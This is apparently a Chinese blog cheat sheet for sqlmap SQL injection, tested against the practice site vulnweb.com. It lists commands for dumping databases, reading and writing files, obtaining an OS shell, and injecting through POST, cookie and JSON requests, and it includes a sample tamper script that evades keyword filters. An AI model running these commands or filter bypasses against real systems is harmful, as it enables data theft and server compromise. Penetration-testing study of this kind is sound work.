#
参考:
https://www.cnblogs.com/bmjoker/p/9326258.html
#
数据猜解
-
库表列数据
&
字典
测试:
http://vulnweb.com/
--current-db
--tables -D ""
--columns -T "" -D ""
--dump -C "" -C "" -T ""
#
权限操作
-
文件
&
命令
&
交互式
测试:
MYSQL
高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd= --os-shell --sql-shell
#
提交方法
-POST&HEAD&JSON
测试:
Post Cookie Json
--data ""
--cookie ""
-r 1.txt
如果是json模式的话 就把数据包放在文件 然后对这文件进行注入
#
绕过模块
-Tamper
脚本
-
使用
&
开发
测试:
base64
注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass(遇到过滤 发现如何绕过 然后·写脚本 再用sqlmap)
def tamper(payload, **kwargs):
if payload:
payload = payload.replace('SELECT','sElEct')
payload = payload.replace('OR','Or')
payload = payload.replace('AND','And')
payload = payload.replace('SLEEP','SleeP')....
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
